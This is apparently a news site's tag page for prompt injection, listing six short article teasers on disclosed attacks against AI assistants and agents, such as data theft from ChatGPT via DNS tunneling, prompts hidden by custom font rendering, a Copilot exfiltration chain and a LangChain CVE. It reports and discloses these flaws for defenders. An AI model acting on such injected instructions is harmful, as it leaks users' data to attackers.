ChatGPT Bug Let Malicious Prompts Exfiltrate Data via DNS
Check Point Research disclosed a ChatGPT vulnerability that abused DNS tunneling to silently steal conversation data. OpenAI patched the flaw on February 20, 2026.
6 articles tagged with "Prompt Injection"
Check Point Research disclosed a ChatGPT vulnerability that abused DNS tunneling to silently steal conversation data. OpenAI patched the flaw on February 20, 2026.
LayerX researchers found that custom font rendering can hide malicious prompts from ChatGPT, Claude, Gemini, and other AI assistants while displaying them to users.
Cisco's State of AI Security 2026 report reveals a dangerous gap between agentic AI adoption ambitions and enterprise security readiness. Here's what the threat landscape looks like.
Varonis researchers disclosed a vulnerability chain that let attackers exfiltrate user data through Copilot with a single malicious link click. Microsoft has patched the issue.
Company admits ChatGPT Atlas remains vulnerable to attacks that hijack AI agents through malicious web content. New defenses deployed, but fundamental risk persists.
CVE-2025-68664 scores CVSS 9.3 and enables secret extraction and prompt injection in LangChain Core. Patch immediately if you're running AI agents.